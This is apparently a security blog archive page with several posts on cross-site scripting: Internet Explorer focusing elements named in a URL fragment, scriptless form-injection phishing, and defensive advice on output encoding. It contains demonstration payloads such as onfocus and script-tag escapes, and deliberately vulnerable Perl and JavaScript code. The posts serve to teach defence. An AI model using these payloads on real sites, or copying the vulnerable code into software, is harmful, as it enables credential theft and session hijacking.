XSS – Page 2 – Tales from the Crypto


Using URL anchors to enliven XSS exploits

I hope this is original, I certainly couldn’t find anything in a quick bit of research on “Internet Explorer”, “anchor” / “fragment id” and “onfocus” or “focus”. [Click here for the TLDR version.]

Those of you who know me, or have been reading this blog for a while know that I have something of a soft spot for the XSS exploits (See here, here, here and here – oh, and here). One of the reasons I like them is that I can test sites without causing any actual damage to them – a reflected XSS that I launch on myself only really affects me. [Stored XSS, now that’s a different matter] And yet, the issues that XSS brings up are significant and severe.

A quick reminder

XSS issues are significant and severe because:

  • An attacker with a successful XSS is rewriting your web site on its way to the user
  • XSS attacks can be used to deliver the latest Java / ActiveX / Flash / Acrobat exploits
  • Stored XSS can affect all of your customers, and can turn your web server into a worm to infect all of your users all of the time
  • A reflected XSS can be used to redirect your users to a competitor’s or attacker’s web site
  • A reflected or stored XSS attack can be used to void any CSRF protection you have in place
  • XSS vulnerability is usually a sign that you haven’t done the “fit and finish” checks in your security reviews
  • XSS vulnerability is an embarrassing rookie mistake, made often by seasoned developers

Make it “SEXY”

So, I enjoy reporting XSS issues to web sites and seeing how they fix them.

It’s been said I can’t pass a Search box on a web site without pasting in some kind of script and seeing whether I can exploit it.

So, the other day I decided for fun to go and search for “security blog” and pick some entries at random. The first result that came up – blog.schneier.com – seemed unlikely to yield any fruit, because, well, Bruce Schneier. I tried it anyway, and the search box goes to an external search engine, which looked pretty solid. No luck there.

A couple of others – and I shan’t say how far down the list, for obvious reasons – turned up trumps. Moderately simple injections into attributes in HTML tags on the search results page.

One only allowed me to inject script into an existing “onfocus” event handler, and the other one allowed me to create the usual array of “onmouseover”, “onclick”, “onerror”, etc handlers – and yes, “onfocus” as well.

I reported them to the right addresses, and got the same reply back each time – this is a “low severity” issue, because the user has to take some action, like wiggling the mouse over the box, clicking in it, etc.

Could I raise the severity, they asked, by making it something that required no user interaction at all, save for loading the link?

Could I make the attack more “sexy”?

Try something stupid

Whenever I’m faced with an intellectual challenge like that, I find that often a good approach is to simply try something stupid. Something so stupid that it can’t possibly work, but in failing it will at least give me insight into what might work.

I want to set the user’s focus to a field, so I want to do something a bit like “go to the field”. And the closest automatic thing that there is to “going to a field” in a URL is the anchor portion, or “fragment id” of the URL.

Anchor? What’s that in a URL?

You’ll have seen them, even if you haven’t really remarked on them very much. A URL consists of a number of parts:


The anchor is often called the “hash”, because it comes after the “hash” or “sharp” or “pound” (if you’re not British) character. [The query often consists of sets of paired keys and values, like “key1=value1&key2=value2”, etc]

The purpose of an anchor is to scroll the window to bring a specific portion to the top. So, you can give someone a link not just to a particular page, but to a portion of that page. It’s a really great idea. Usually an anchor in the URL takes you to a named anchor tag in the page – something that reads “<a name=foobar></a>” will, for instance, be scrolled to the top whenever you visit it with a URL that ends with “#foobar”.

[The W3C documentation only states that the anchor or fragment ID is used to “visit” the named tag. The word “visit” is never actually defined. Common behaviour is to load the page if it’s not already loaded, and to scroll the page to bring the visited element to the top.]

This anchor identifier in the URL is also known as a “fragment identifier”, because technically the anchor is the entire URL. Not what people make as common usage, though.

XSS fans like myself are already friendly with the anchor identifier, because it has the remarkable property of never being sent to the server by the browser! This means that if your attack depends on something in the anchor identifier, you don’t stand much chance of being detected by the server administrators.


The stupid thing

So, the stupid thing that I thought about is “does this work for any name? and is it the same as focus?”

Sure enough, in the W3C documentation for HTML, here it is:

Destination anchors in HTML documents may be specified either by the A element (naming it with the name attribute), or by any other element (naming with the id attribute).

[From http://www.w3.org/TR/html4/struct/links.html#h-12.1]

So, that means any tag with an “id” attribute can be scrolled into view. This effectively applies to any element with a “name” attribute too, because:

This attribute [name] names the current anchor so that it may be the destination of another link. The value of this attribute must be a unique anchor name. The scope of this name is the current document. Note that this attribute shares the same name space as the id attribute. [my emphasis]

[From http://www.w3.org/TR/html4/struct/links.html#adef-name-A]

This is encouraging, because all those text boxes already have to have ids or names to work.

So, we can bring a text box to the top of the browser window by specifying its id or name attribute as a fragment.

That’s the first stupid thing checked off and working.

Bringing it into focus

But moving a named item to the top of the screen isn’t the same as selecting it, clicking on it, or otherwise giving it focus.

Or is it?

Testing in Firefox, Chrome and Safari suggested not.

Testing in Internet Explorer, on the other hand, demonstrated that even for as old a version as IE8, all the way through IE9 and IE10, caused focus behaviour – including any “onfocus” handler – to trigger.

The TLDR version:

Internet Explorer has a behaviour different from other browsers which makes it easier to exploit a certain category of XSS vulnerabilities in web sites.

If you are attacking users of a vulnerable site that allows an attacker to inject code into an “onfocus” handler (new or existing), you can force visitors to trigger that “onfocus” event, simply by adding the id or name of the vulnerable HTML tag to the end of the URL as a fragment ID.

You can try it if you like – using the URL http://www.microsoft.com/en-us/default.aspx#ctl00_ctl16_ctl00_ctl00_q

OK, so you clicked it and it didn’t drop down the menu that normally comes when you click in the search field on Microsoft’s front page. That’s because the onfocus handler wasn’t loaded when the browser set the focus. Try reloading it.

You can obviously build any number of test pages to look at this behaviour:


<input type="text" name="exploit" id="exploitid" onfocus="alert(1)" />


Loading that with a link to formpage.html#exploit or formpage.html#exploitid will pop up an ‘alert’ dialog box.

So, that’s a security flaw in IE, right?

No, I don’t think it is – I don’t know that it’s necessarily even a flaw.

The documentation I linked to above only talks about the destination anchor being used to “visit” a resource. It doesn’t even say that the named anchor should be brought into view in any way. [Experiment: what happens if the ID in the fragment identifier is a “type=hidden” input field?]

It doesn’t say you should set focus; it also doesn’t say you should not set focus. Setting focus may be simply the most convenient way that Internet Explorer has to bring the named element into view.

And the fact that it makes XSS exploits a little easier doesn’t make it a security flaw either – the site you’re visiting STILL has to have an XSS flaw on it somewhere.

Is it right to publish this?

Finally, the moral question has to be asked and answered.

I start by noting that if I can discover this, it’s likely a few dozen other people have discovered it too – and so far, they’re keeping it to themselves. That seems like the less-right behaviour – because now those people are going to be using this on sites unaware of it. Even if the XSS injection is detected by the web site through looking in their logs, those same logs will tell them that the injection requires a user action – setting focus to a field – and that there’s nothing causing that to happen, so it’s a relatively minor issue.

Except it’s not as minor as that, because the portion of the URL that they CAN’T see is going to trigger the event handler that just got injected.

So I think the benefit far outweighs the risk – now defenders can know that an onfocus handler will be triggered by a fragment ID in a URL, and that the fragment ID will not appear in their log files, because it’s not sent to the server.

I’ve already contacted Microsoft’s Security team and had the response that they don’t think it’s a security problem. They’ve said they’ll put me in touch with the Internet Explorer team for their comments – and while I haven’t heard anything yet, I’ll update this blog when / if they do.

In general, I believe that the right thing to do with security issues is to engage in coordinated disclosure, because the developer or vendor is generally best suited to addressing specific flaws. In this case, the flaw is general, in that it’s every site that is already vulnerable to XSS or HTML injection that allows the creation or modification of an “onfocus” event handler. So I can’t coordinate.

The best I can do is communicate, and this is the best I know how.

On new exploit techniques

Last year’s discussion on “Scriptless XSS” made me realise that there are two kinds of presentation about new exploits – those that talk about a new way to trigger the exploit, and those that talk about a new way to take advantage of the exploit.

Since I didn’t actually see the “Scriptless XSS” presentation at Blue Hat (not having been invited, I think it would be bad manners to just turn up), I won’t address it directly, and it’s entirely possible that much of what I say is actually irrelevant to that particular paper. I’m really being dreadfully naughty here and setting up a strawman to knock down. In the tech industry, this practice is often referred to as “journalism”.

So where’s my distinction?

Let’s say you’re new to XSS. It’s possible many of you actually are new to XSS, and if you are, please read my previous articles about how it’s just another name for allowing an attacker to inject content (usually HTML) into a web page.

Your first XSS exploit example may be that you can put “<script>alert(1)</script>” into a search field, and it gets included without encoding into the body of the results page. This is quite frankly so easy I’ve taught my son to do it, and we’ve had fun finding sites that are vulnerable to this. Of course, we then inform them of the flaw, so that they get it fixed. XSS isn’t perhaps the most damaging of exploits – unlike SQL injection, you’re unlikely to use it to steal a company’s entire customer database – but it is an embarrassing indication that the basics of security hygiene are not being properly followed by at least some of your development team.

The trigger of the exploit here is the “<>” portion (not including the part replaced by ellipsis), and the exploit itself is the injection of script containing an alert(1) command.

Let’s say now that the first thing a programmer tries to protect his page is to replace the direct embedding of text with an <input> tag, whose value is set to the user-supplied text, in quotes.

Your original exploit is foiled, because it comes out as:

<input readonly=1 value="<script>alert(1)</script>">

That’s OK, though, because the attacker will see that, and note that all he has to do is provide the terminating quote and angle bracket at the start of his input, to produce instead:

<input readonly=1 value=""><script>alert(1)</script>">

This is a newer method of exploiting XSS-vulnerable code. Although a simple example, this is the sort of thing it’s worth getting excited about.

Why is that exciting?

It’s exciting because it causes a change in how you planned to fix the exploit. You had a fix that prevented the exploit from happening, and now it fails, so you have to rethink this. Any time you are forced to rethink your assumptions because of new external data, why, that’s SCIENCE!

And the other thing is…?

Well, the other thing is noting that if the developer did the stupid thing, and blocked the word “alert”, the attacker can get around that defence by using the “prompt” keyword instead, or by redirecting the web page to somewhere the attacker controls. This may be a new result, but it’s not a new trigger, it’s not a new cause.

When defending your code against attack, always ask yourself which is the trigger of an attack, rather than the body of the attack itself. Your task is to prevent the trigger, at which point the body becomes irrelevant.

Time to defend myself.

I’m sure that someone will comment on this article and say that I’m misrepresenting the field of attack blocking – after all, the XSS filters built into major browsers surely fall into the category of blocking the body, rather than the trigger, of an attack, right?

Sure, and that’s one reason why they’re not 100% effective. They’re a stopgap measure – a valuable stopgap measure, don’t get me wrong, but they are more in the sense of trying to recognise bad guys by the clothing they choose to wear, rather than recognising bad guys by the weapons they carry, or their actions in breaking locks and planting explosives. Anyone who’s found themselves, as I have, in the line of people “randomly selected for searching” at the airport, and looked around and noted certain physical similarities between everyone in the line, will be familiar with the idea that this is more an exercise in increasing irritation than in applying strong security.

It’s also informative to see methods by which attacks are carried out – as they grow in sophistication from fetching immediate cookie data to infecting browser sessions and page load semantics, it becomes easier and easier to tell developers “look at all these ways you will be exploited, and you will begin to see that we can’t depend on blocking the attack unless we understand and block the triggers”.

Keep doing what you’re doing

I’m not really looking to change any behaviours, nor am I foolish enough to think that people will start researching different things as a result of my ranting here.

But, just as I’ve chosen to pay attention to conferences and presentations that tell me how to avoid, prevent and fix, over those that only tell me how to break, I’ll also choose to pay attention to papers that show me an expansion of the science of attacks, their detection and prevention, over those that engage in a more operational view of “so you have an inlet, what do you do with it?”

XSS Hipster loved Scriptless XSS before it was cool

I was surprised last night and throughout today, to see that a topic of major excitement at the Microsoft BlueHat Security Conference was that of “Scriptless XSS”.

The paper presented on the topic certainly repeats the word “novel” a few times, but I will note that if you do a Google or Bing search for “Scriptless XSS”, the first result in each case is, of course, a simple blog post from yours truly, a little over two years ago, in July 2010.

As the article notes, this isn’t even the first time I’d used the idea that XSS (Cross Site Scripting) is a complete misnomer, and that “HTML injection” is a more appropriate description. JavaScript – the “Scripting” in most people’s explanations of Cross Site Scripting – is definitely not required, and is only used because it is an alarmingly clear demonstration that something inappropriate is happening.

Every interview in the security field – every one!

Every time I have had an interview in the security field – that’s since 2006 – I’ve been asked “Explain what Cross Site Scripting is”, and rather hesitantly at first, but with growing surety, I have answered that it is simply “HTML injection”, and the conversation goes wonderfully from there.

Why did I come up with this idea?

Fairly simply, I’ve found that if you throw standard XSS exploits at developers and tell them to fix the flaw, they do silly things like blocking the word “script”. As I’ve pointed out before, Cross Site Scripting (as with all injection attacks) requires an Injection (how the attacker provides their data), an Escape (how the attacker’s data moves from data into code), an Attack or Execution (the payload), and optionally a Cleanup (returning the user’s browser state to normal so they don’t notice the attack happening).

It’s not the script, stupid, it’s the escape.

Attacks are wide and varied – the paper on Scriptless Attacks makes that clear, by presenting a number of novel (to me, at least) attacks using CSS (Cascading Style Sheet) syntax to exfiltrate data by measuring scrollbars. My example attack used nothing so outlandish – just the closure of one form, and the opening of another, with enough CSS attribute monkeying to make it look like the same form. The exfiltration of data in this case is by means of the rather pedestrian method of having the user type their password into a form field and submit it to a malicious site. No messing around with CSS to measure scrollbars and determine the size of fonts.

Hats off to these guys, though.

I will say this – the attacks they present are an interesting and entertaining demonstration that if you’re trying to block the Attack or Cleanup phases of an Injection Attack, you have already failed, you just don’t know it yet. Clearly a lot of work and new study went into these attacks, but it’s rather odd that their demonstrations are about the more complicated end of Scriptless XSS, rather than about the idea that defenders still aren’t aware of how best to defend.

Also, no doubt, they had the sense to submit a paper on this – all I did was blog about it, and provide a pedestrian example with no flashiness to it at all.

Hipster gets no respect.

So, yeah, I was talking about XSS without the S, long before it was cool to do so. As my son informs me, that makes me the XSS Hipster. It’d be gratifying to my ego to get a little nod for that (heck, I don’t even get an invite to BlueHat), but quite frankly rather than feeling all pissed off about that, I’m actually rather pleased that people are working to get the message out that JavaScript isn’t the problem, at least when it comes to XSS.

The problem is the Injection and the Escape – you can block the Injection by either not accepting data, or by having a tight whitelist of good values; and you can block the Escape by appropriately encoding all characters not definitively known to be safe.

NCSAM/2011–Post 17–SSL does not make your web site secure

I know, it sounds like complete heresy, but there it is – SSL and HTTPS will not make your web site secure.

Even more appropriate (although I queued the title of this topic up almost a month ago) is this recent piece of news: Top FBI Cyber Cop Recommends New Secure Internet, which appears to make much the opposite point, that all our problems could be fixed if we were only to switch to an Internet in which everyone is identified (something tells me the FBI is not necessarily looking for us to use strong encryption).

HTTPS is just one facet of your web site security

There are a number of ways in which an HTTPS-only website, or HTTPS-only portion of a site, can be insecure. Here’s a list of just some of them:

Application vulnerabilities

It’s been a long time since web servers provided only static content in their pages. Now it’s the case that pretty much every web site has to serve “applications”, in which inputs provided by the visitor to the site get processed and involved in outputs.

There are any number of ways in which those inputs can produce bad outputs – Cross Site Scripting (XSS), on which I’ve posted before; Cross Site Request Forgery, allowing an attacker to force you to take actions you didn’t intend; SQL injection, where data behind a web site can be extracted and/or modified – these are just the most commonly known.

Applications can also fail to check credentials, fail to apply access controls, and even fail in some old-fashioned ways like buffer overflows leading to remote code execution.

Path vulnerabilities

Providing sensitive information in an application’s path, or through parameters passed in a URL, is another common means by which application authors, who think they are protected by using HTTPS, come a significant cropper. URLs – even HTTPS protected URLs – are often read, logged, and processed at both ends of the connection, and sometimes even in the middle!

Egress filtering in enterprises is often carried out by interrupting the HTTPS communication between client and server, using a locally-deployed trusted root certificate. This quite legitimately allows the egress filtering system to process URLs to determine what’s a safe request, and what’s a dangerous one. This can also cause information sent in a URL to be exposed. This is one reason why an application developer should avoid using GET requests to perform and data exchange for user data, or for data that the site feels is sensitive.

Other path vulnerabilities – mostly fixed these days, but still something that attackers and scanning suites alike feel is worth trying – are those where the path can be changed by embedding extra slash or double-dot characters or sequences. Enough “..” entries in a path, and if the server isn’t properly written or managed, an attacker can escape out of the web server’s restrictions, and visit the operating system disk. The official term for this is a “path traversal attack”.

Credential vulnerabilities

The presence of a padlock – or whatever your web browser shows to indicate an HTTPS, rather than HTTP, connection, indicates a few things:

  • Your communication is encrypted (This can be overcome, but it takes so much work at both client and server for most implementations that I think it’s fair to say you will not be in the situation where you see a padlock without the use of encryption.)
    • That doesn’t mean to say you will always have the best encryption around, but if you didn’t go and enable weaker encryption than that supplied in a recent and patched browser, you’re fairly well guaranteed to be safe.
  • The web site you are connecting to is at least trying to give some indication of security.
  • The web site to which you connected has convinced your browser – or you – that it is who it claims to be in the address bar.
    • Note that this may not mean that it passes a test of its identity that you really want. You could be in an enterprise with an SSL-interrupting egress filter, as explained above, you could have been convinced fraudulently to accept the site’s certificate, or you could have installed an inappropriate certificate authority’s root certificate.

If you’re the sort of person who clicks through browser warnings, all you’ve managed to confirm is that your communication is encrypted, and the site you’ve connected to is trying to convince you it is secure. Note that this is exactly what a fraudulent site will try to do. The padlock isn’t everything.

Then think about where your secret information goes. If you’re like a lot of users, you’ll be using the same password on every site you connect to, or some variation thereof. Just because the site uses SSL does not mean that you

But at least it’s a start.

If your bank doesn’t use HTTPS when accepting your logon information, it’s a sign that they really aren’t terribly interested in protecting that transaction. Maybe you should ask them why.

Many web sites will use HTTPS on parts of the site, and HTTP on others. Observe what they choose to protect, and what they choose to leave public. Is the publicly-transmitted information truly public? Is it something you want other people in the coffee shop or library to know you’re browsing?

Simplifying Cross Site Scripting / HTML Injection

Some simple statements about Cross Site Scripting / XSS / HTML Injection (all terms for the same thing):

  • Ignore the term “Cross Site Scripting” as a confusing anachronism. Think “HTML Injection” whenever you hear “Cross Site Scripting”, and you won’t go wrong.
  • The problem of XSS can be summed up quite simply as:
    • XSS allows an outsider to re-write your vulnerable web page(s) before your end users see them.
      • That means any part of the web page can be re-written to do anything your web page could do to the end user
      • That means any attack on your users will be trusted as much as your users trust you
      • That means your users’ credentials, session cookies and other secret information is controlled by an attacker
    • XSS is hard to detect, and in some cases impossible for you, the server owner, to detect an attack on your users.
    • XSS is easy to prevent, but requires your developers to be aware of, and work to prevent, the problem.
    • The presence of XSS vulnerabilities may void your compliance with regulatory standards such as PCI, SOX, etc.
      • Allowing outsiders to rewrite your web page may mean that you cannot state that you adequately control access to the collection of financially significant data.
      • PCI requires you develop applications with regard to a recognised standard framework, and specifically points to OWASP. OWASP lists XSS and Injection flaws as two of the “top ten” vulnerabilities to prevent. This is as close as PCI gets to outright stating that XSS prevents compliance from being achievable.
  • All XSS attacks have four components:
    • The Injection
      • Where the attacker provides bad data, either directly to the user, or through a ‘store and replay’ mechanism.
    • The Escape (from “text” / “data” to “code”)
      • The escape is optional – but that option is under the control of the page’s author
      • If the page author requires an escape, the attacker cannot attack without correctly escaping
    • The Attack
      • The attack is mandatory – an XSS attack requires an attack component. Duh.
      • However – where an escape is required by the web page, the attack must follow the escape.
      • There are numerous possible attacks – and more being developed daily. You cannot list all possible attack patterns.
    • The Cleanup
      • The cleanup is optional, at the choice of the attacker, and hides from the user the fact that they have been exploited
      • Many attacks are fast enough to use your users’ credentials that the cleanup is not required. By the time the user notices (often only a second or so), the attacker has stolen the account, made purchases or read off credit card information.
  • Given this component approach, you as a web page author have limited options:
    • You can’t block the cleanup, because it’s too late at that point – the attack has occurred, and besides, the attacker may not be interested in the cleanup. The cleanup is really only useful in demonstrating that subtle attacks can take place, giving attackers months to clean out a credit card.
    • Blocking the attack is a leaky measure – not that it isn’t worth doing in some cases. For instance, browser protections against XSS often block the attack measure because they don’t control the web site, and can’t reasonably block anything else.
    • Blocking the escape is a guaranteed measure. If attacker-supplied code cannot be viewed by the browser as code, there is no possibility of attack.
    • Blocking the injection is also a guaranteed measure, with two caveats – when you block an injection, you have to make sure that the injection hasn’t already occurred, and that it cannot occur from any other sources.
      • This means that if you block injection of code into, say, a database of message forum posts,you have to scan the existing posts to ensure that the injection hasn’t already taken place.
        • Clean your database when you recognise an injection or attack pattern.
      • Any time there is a database that accumulates information for later display, there will be more than one source vying to put data into the database. If injection is possible in one source, injection is likely from other sources, too.
        • Funnel all sources through one injection filter.
      • Preventing an escape from text into code works whether or not all the injections are blocked.
        • Never rely on injection prevention alone.
  • No matter how innovative attackers get, Cross Site Scripting attacks need not occur.
    • Learn how browsers differentiate between text and code.
    • Use that knowledge to ensure that text remains text, and is never seen as code.
    • Let the browser and your web server platform and libraries help you
      • Use an appropriate document object model function to set text values on fields.
      • Instead of composing HTML in a string to include user supplied text, use a <span> or a <div>, and set its innerText property.
    • Don’t sacrifice safety for speed.
      • Don’t build HTML “on the fly”, either while generating the page or displaying it.
        • InnerHTML is a bad thing to set.
    • Don’t try to “test out” XSS vulnerabilities.
      • You (or your testers) are not Ash Ketchum, and therefore cannot “catch ‘em all”.
    • Develop XSS vulnerabilities out of your application
      • Anything you didn’t specifically write as code, is attacker-supplied untrustworthy data.
      • Prevent injections as much as possible by validating that input is correctly formed.
        • Note that you can’t completely validate all input in all cases.
        • The obvious “bad example” is that of a bug reporting system into which security vulnerability reports are placed. If I have to report an issue with an XSS flaw, I’m going to be deliberately and respectfully pasting XSS attack code into your application. So in that case, you cannot possibly validate my information and remove “invalid” code without removing the valuable part of the text!
        • Validation at the Client is for Convenience only – it allows you to quickly say “that’s not right” and have the user correct it.
        • Only validation at the Server is for Security. Anything you ask the client browser to do on your behalf may be ignored.
      • If you have limited resources, focus on preventing the ability to escape from text into code.
        • Do this by encoding output so that each level of processing can accurately and uniformly distinguish between code and data.
          • This means you must know what each level of processing uses as encoding or escaping of character sequences.
          • This also means you must know how many layers of processing there are between you and the user.
  • If you do ONE THING to prevent XSS on your site, output encoding is the one thing to do.
    • Defence in depth says “never do just one thing”. One thing will one day fail to be implemented properly.

Cross-Site Scripting (XSS) – no script required

I’m going to give away a secret that I’ve successfully used at every interview I’ve had for a security position.

Cross-Site Scripting” (XSS) is a remarkably poor term for the attack or vulnerability (code can be particularly vulnerable to a cross-site scripting attack) it describes. The correct term should be “HTML Injection”, because it succinctly explains the source of the problem, and should provide developers with pretty much all the information they need to recognise, avoid, prevent, and address the vulnerabilities that lead to these attacks being possible.

  1. It doesn’t abbreviate well – the accepted abbreviation is XSS, because CSS was taken by “Cascading Style Sheets”
  2. Nobody seems to be able to explain, definitively and without the possibility of being contradicted by someone else’s explanation, whether “Cross Site” means “intra site”, “inter site”, both or neither. Certainly there are examples of attacks which use one XSS-vulnerable page only to exploit a user.
  3. As you will see from the remainder of this post, no actual script is required at all, either on the browser, or on the server. So, disabling script in the browser, or running a tool such as noscript that essentially does the same thing for you, is not a complete solution.
  4. HTML Injection can include injecting ActiveX, Flash, Java, or JavaScript objects into an HTML page.

[Note that I am not suggesting that prior work into XSS protections is bad, just that it is not complete if it focuses on JavaScript / ECMAScript / whatever you want to call it.]

Failure to understand XSS has led to people assuming that they can protect themselves by simple measures – disabling JavaScript, filtering “<script>” tags, “javascript:” URLs, and so on. Such approaches have uniformly failed to work, in much the same way as other “black-list” methods of defeating attacks on security flaws – it pretty much dares the attacker to find a way to exploit the bug using something else.

Particularly galling is when I look at code whose developers had heard about XSS, had looked about for solutions, and had found a half-baked solution that made them feel better about their code, made the bug report go from “reproducible” to “cannot reproduce”, but left them open to an attacker with a little more ingenuity (or simply a more exhaustive source of sample attacks) than they had. It seems that developers often try, but are limited by the resources they find on the Intarweb – particularly blogs seem to provide poor solutions (ironic, I know, that I am complaining about this in my blog).

I know all this – give me something new.

Alright then, here’s something that appears to be new to many – a demonstration of Cross-Site Scripting without scripting.

We all know how XSS happens, right? A programmer wants to let the user put some information on the page. Let’s say he wants to warn the user that his password was entered incorrectly, or his logon session has expired. So, he needs to ask the user to enter username and password again, but probably wants to save time by putting the user’s name in place for the user, to save on typing.

Here’s what the form looks like – you’ve all seen it before:


The code for this form is simple, mostly to make the example easy. I’ll write it in Perl and Javascript – because the Perl version is exploitable everywhere, and because the Javascript version demonstrates how DOM-based XSS attacks work (and how browser strangeness can cause them to be flakey).

[Note: A DOM-based attack, for those that don’t know, is an attack that uses Javascript to modify the HTML page while it is at the browser’s site. These are difficult to detect, but generally result from the use of unsafe functionality such as the innerHTML call.]

Needles to say – don’t use these as examples of good code – these are EXAMPLES of VULNERABLE CODE. And lousy code at that.


use CGI;
$query = new CGI;
print $query->h1("
Session timed out."), $query->p("You have been logged out from the site - please enter your username and password to log back in."), $query->start_form(-action=>"happyPage.htm", -method=>"get"), "Username: <input name=\"username\" value=\"" + $query->param("username") + "\" />",$query->br(),
"Password: ", $query->input(-name=>"password",-type=>"password"),$query->br(), $query->submit(),


<h1>Session timed out.</h1>
<p >You have been logged out from the site - please enter your username and password to log back in.</p>
<form id="safeForm" action="happyPage.htm" method="get">
  Username: <input name="username" value="name placeholder" /><br />
  Password: <input name="password" type="password" /><br />
  <input type="submit" />

<script type="text/javascript">
    var queries;
    function getQueryString(key) {
        if (queries == undefined) {
            queries = {};
            var s = window.location.href.replace(/[^?]+\?/, "").split("&");
            for (var x in s) {
                var v = s[x].split("=");
                if (v.length == 2)
                    queries[v[0]] = decodeURIComponent(v[1].replace(/\+/g, " "));
        if (key in queries)
            return queries[key];
        return "";

    var myField = document.getElementById("safeForm");

    if (myField != null) {
        var un = getQueryString("username");

        // Build the form with the username passed in.

        myField.innerHTML = myField.innerHTML.replace(/name placeholder/,un);

Side Note – on DOM-based XSS and anchors

Now, why did I specifically include the “getQueryString” in my Javascript version above? I could have simply said “assume this function exists with ordinary behaviour”. Well, I chose that one (downloaded from, naturally, a blog advising how to do this properly) because it processes the entire href, anchor and all.

If we modify our URL by adding “#&” between the query and the variable “username”, it demonstrates one of the more frightening aspects of DOM-based attacks. Those of you who are aware of what an anchor does to a browser will already have figured it out, but here’s a quick explanation.

The “anchor” is considered to be everything after the “#” in a URL. Although it looks like it’s part of the query string, it’s not. Browsers don’t send the “#” or anything after it to the server when requesting a web page, so it’s not seen in a network trace, and it’s not seen in the server logs. This means that DOM-based attacks can hide all manner of nastiness in the anchor, and your scanners won’t pick it up at all.

Back to the scriptless XSS…

So, this page would normally get executed with a parameter, “username” which would be the username whose account we’re asking for credentials for – and certainly it works with http://localhost/XSSFile.htm?username=Fred@example.com :


The trouble is, it also works with the XSS attackers’ favourite test example, alert("XSS")%3b’>http://localhost/XSSFile?username="><script>alert("XSS")%3b</script> :


Now, I’ve seen developers who are given this demonstration that their page is subject to an XSS attack. What do they do? They block the attack. Note that this is not the same as removing or fixing the vulnerability. What these guys will do is block angle brackets, or the tag “<script>”. As a security guy, this makes me sigh with frustration, because we try to drill it into people’s heads, over and over and over again, that blacklisting just doesn’t work, and that “making the repro go away” is not equivalent to “fixing the problem demonstrated by the repro”.

The classic attacker’s response to this is to go to http://ha.ckers.org/xss.html for the XSS Cheat Sheet, and pull something interesting from there. Maybe use the list of events, say, to decide that you could set the ‘onfocus’ handler to execute your interesting code.

But no, let’s suppose by some miracle of engineering and voodoo the defender has managed to block all incoming scripts. Even so, we’re still vulnerable to XSS.

What happens if we try this link:


[The “%3d” there is a hex value representing the “=” character so that the query-string parser doesn’t split our attack.]


OK, that’s kind of ugly – but it demonstrates that you can use an XSS vulnerability to inject any HTML – including a new <form> tag, with a different destination – “badpage” in our URL above, but it could be anywhere. And by hiding the attacked input field, we can engineer the user into thinking it’s just a display issue

With some piggery-jokery, we can get to this:


Looks much better (and with more work, we could get it looking just right):


So, there you have a demonstration of scriptless cross-site scripting. XSS, or HTML Injection, as I’d prefer you think of it, can inject any tag(s) into your page – can essentially rewrite your page without your knowledge. If you want to explain the magnitude of XSS, it is simply this – an attacker has found a way to rewrite your web page, as if he was employed by you.

[Of course, if I hadn’t been trying to demonstrate that XSS is a misnomer, and prove that you can shove any old HTML into it, I would simply have used a piece of script, probably on the onmouseover event, to set the action of the form to post to my bad site. Fewer characters. Doing so is left as an exercise for the reader.]

Side discussion – why does the Javascript version work at all?

It doesn’t work in Internet Explorer, but in other browsers, it seems to work just fine. At first look, this would seem to suggest that “innerHTML” on a <form> tag is allowing the “</form">” in the XSS to escape out from the parent form. I can assure you that’s not the case, because if you could escape out, that would be a security flaw in the browsers’ implementation of innerHTML. So, what’s it doing, and how do you find out?